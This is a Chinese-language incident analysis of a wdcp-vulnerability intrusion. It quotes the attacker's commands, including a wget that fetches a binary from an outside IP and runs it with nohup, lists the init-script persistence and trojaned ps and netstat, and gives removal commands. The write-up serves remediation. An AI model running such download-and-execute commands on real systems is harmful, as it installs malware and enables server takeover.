联系到我的几位客户都是相同的情况,相同的日期(10月27日)由相同的IP(117.42.52.36,扫了下,可以确定这个IP不是服务器主机,至于是黑 客自己的电脑还是肉鸡就不得而知了)利用wdcp漏洞入侵。 从日志来看,入侵是由工具自动化完成的。 黑 客入侵后留下的命令记录如下: cd /root wget http://60.172.229.178/3.rar chmod 0755 /root/3.rar chmod 0755 ./3.rar /dev/null 2>&1 & nohup ./3.rar > /dev/null 2>&1 & (3.rar MD5为:522a3b05908c40e37c08e8fb14171dfc) 下面主要写一下3.rar(注意这是个二进制程序,而非压缩包)执行后修改过的文件,给大家修复提供参考。 创建文件: /etc/rc.d/init.d/DbSecuritySdt /etc/rc.d/rc1.d/S97DbSecuritySdt /etc/rc.d/rc2.d/S97DbSecuritySdt /etc/rc.d/rc3.d/S97DbSecuritySdt /etc/rc.d/rc4.d/S97DbSecuritySdt /etc/rc.d/rc5.d/S97DbSecuritySdt 上面的文件内容都一样,内容为: #!/bin/bash /root/3.rar 目的是让3.rar重启后自动运行。 创建文件: /usr/bin/bsd-port/getty 文件内容和3.rar相同。 同目录下还有conf.n和getty.lock。 创建文件: /usr/bin/acpid 文件内容和3.rar相同。 创建文件: /etc/rc.d/init.d/selinux /etc/rc.d/rc1.d/S99selinux /etc/rc.d/rc2.d/S99selinux /etc/rc.d/rc3.d/S99selinux /etc/rc.d/rc4.d/S99selinux /etc/rc.d/rc5.d/S99selinux 文件内容如下: #!/bin/bash /usr/bin/bsd-port/getty 目的还是让恶意程序在系统重启后自动行动。 创建目录: /usr/bin/dpkgd/ 目录下有二个程序: netstat ps 这个是系统中正常的程序,转移到这里做了备份。 替换掉了系统中的/bin/ps和/bin/netstat。 替换后的程序在执行后可以隐藏掉恶意程序的相关执行信息,并且加入了复活恶意程序的功能。 文件操作到此结束。 如果确定和本文描述的入侵情况完全相同,可以用下面的命令修复: killall 3.rar getty acpid rm -f /etc/rc.d/rc*.d/S97DbSecuritySdt rm -f /etc/rc.d/init.d/DbSecuritySdt rm -rf /usr/bin/bsd-port/ rm -f /usr/bin/acpid rm -f /etc/init.d/selinux rm -f /etc/rc.d/rc*.d/S99selinux rm -f /bin/ps /bin/netstat cp /usr/bin/dpkgd/ps /bin/ cp /usr/bin/dpkgd/netstat /bin/ 这次的WDCP漏洞中,这个3.rar做的恶比较多,但它并不是唯一的做恶者(其他的人或者程序会留下其他的东西,不在上面的描述范围内)。 最早的入侵痕迹在10月初已经出现,3.rar出现的比较晚,但是出现的多,而且表面上造成的影响比较大(对外扫描肯定会导致机器被封,在国外某些主机商甚至会BAN帐号)。 全文完。 (责任编辑:IT) |